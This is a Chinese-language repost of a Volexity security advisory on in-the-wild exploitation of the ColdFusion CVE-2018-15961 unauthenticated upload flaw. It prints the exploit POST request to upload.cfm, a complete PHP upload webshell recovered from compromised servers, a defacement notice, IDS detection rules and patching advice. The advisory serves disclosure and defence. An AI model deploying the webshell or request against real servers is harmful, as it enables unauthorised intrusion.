Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

CVE-2018-15961在野利用

0
0

如果你的企业运行着ColdFusion网络版,那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁,并且没有公布该漏洞的详情和PoC。

Volexity检测到的攻击活动中,中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961,影响版本包括ColdFusion 11、ColdFusion 2016、ColdFusion 2018等4年内发布的所有版本。

Adobe的ColdFusion web应用开发平台一直是APT组织攻击的目标。主流的ColdFusion包括WYSIWYG 富文本编辑器CKEditor。在过去的ColdFusion版本中,Adobe打包了原来的FCKeditor。Adobe在决定用FCKeditor替代CKEditor时,意外引入了一个新的非认证文件上传漏洞。该漏洞与2009年发现的FCKeditor非认证文件上传漏洞非常类似。

APT组织利用CVE-2018-15961漏洞

Volexity在Adobe发布该漏洞安全更新后约2周发现了该漏洞的在野利用。 可以通过一个简单的HTTP POST请求到upload.cfm文件进行利用,upload.cfm是没有限制的,也不需要任何的认证。下面是解释该漏洞利用的POST请求:

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: multipart/form-data; boundary=―――――――――5b12d3a3190134 Accept-Encoding: gzip, deflate Content-Length: 9308 Host: <hostname> Pragma: no-cache Connection: close ――――――――― 5b12d3a3190134 <redacted>

Volexity发现APT组织利用来漏洞来上传JSP版本的中国菜刀,并在允许通过CKEditor上传前在受感染的web服务器上执行命令。相关的配置文件settings.cfm如下所示:

<cfset settings.disfiles = “cfc,exe,php,asp,cfm,cfml”> CVE-2018-15961利用

在识别APT利用CVE-2018-15961后,Volexity检查了许多有网络连接的ColdFusion web服务器。这些服务器隶属于不同的组织,包括教育机构、州政府、医疗研究机构等。这些站点都有尝试webshell上传的痕迹。Volexity不能确认这些实例中是否有漏洞被滥用的情况。但是基于受感染的服务器上的文件,研究人员相信有非APT组织成员的用户在9月11日前已经识别了该漏洞。被入侵的网站上都有以下两个目录之一:

/cf_scripts/

/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/

大多数攻击实例中,这些文件的最后修改日期为6月2日或6月6日。许多网站上都有增加up.php.fla文件失败的遗留代码。.fla扩展并不常用,可能是因为攻击者没有发现.jsp文件扩展是允许上传的。

<?php
$files = @$_FILES[“files”];
if ($files[“name”] != ”) {
$fullpath = $_REQUEST[“path”] . $files[“name”];
if (move_uploaded_file($files[‘tmp_name’], $fullpath)) {
echo “<h1><a href=’$fullpath’>OK-Click here!</a></h1>”;
}
}echo ‘<html><head><title>Upload files…</title></head><body><form method=POST enctype=”multipart/form-data” action=””><input type=text name=path><input type=”file” name=”files”><input type=submit value=”Up”></form></body></html>’;
?>

许多受影响的网站都含有一个来自黑客组织TYPICAL IDIOT SECURITY的HTML index文件。网页内容如下:

Hacked by AnoaGhost Typical Idiot Security
#together laugh in ur security since 2k17#
We are:~Khunerable SPEEDY-03 PYS404 Mirav Grac3 AnoaGhost Jje Incovers Panataran magelangGetar Kersen.id

该黑客组织好像来自印度尼西亚,其成员AnoaGhost与支持ISIS的黑客组织有关联。

签名

以下入侵检测系统签名可以用于检测CVE-2018-15961滥用:

Suricata:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;)
Snort:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;) 建议

如果你的ColdFusion服务器有网络连接,那么可以检查一下日志文件和目录看是否有可疑文件。如果发现了可以的日志记录或文件,需要进行进一步的分析。

Volexity建议用户尽早更新Adobe ColdFusion补丁。最好的办法是在管理员面包中配置补丁升级。下图是Server Update>Updates>Settings的默认设置:


CVE-2018-15961在野利用

Volexity建议对配置进行如下修改:

开启Automatically Check for Updates(自动更新)选项

将Check for updates every 10 days(检查更新的时间)从10天修改为1天,这样每天都会检查更新

配置正确的email,以接收安全更新通知。

Volexity同时建议所有ColdFusion管理员的访问限制为IP白名单,以减小攻击面。

总结

Adobe ColdFusion存在远程利用漏洞已经很长时间了,也是国家级攻击者非常喜欢的目标。补丁管理是预防此类攻击的非常有效的办法。但Volexity建议用户检查使用的版本并尽快更新到最新版。

https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/


Viewing all articles
Browse latest Browse all 12749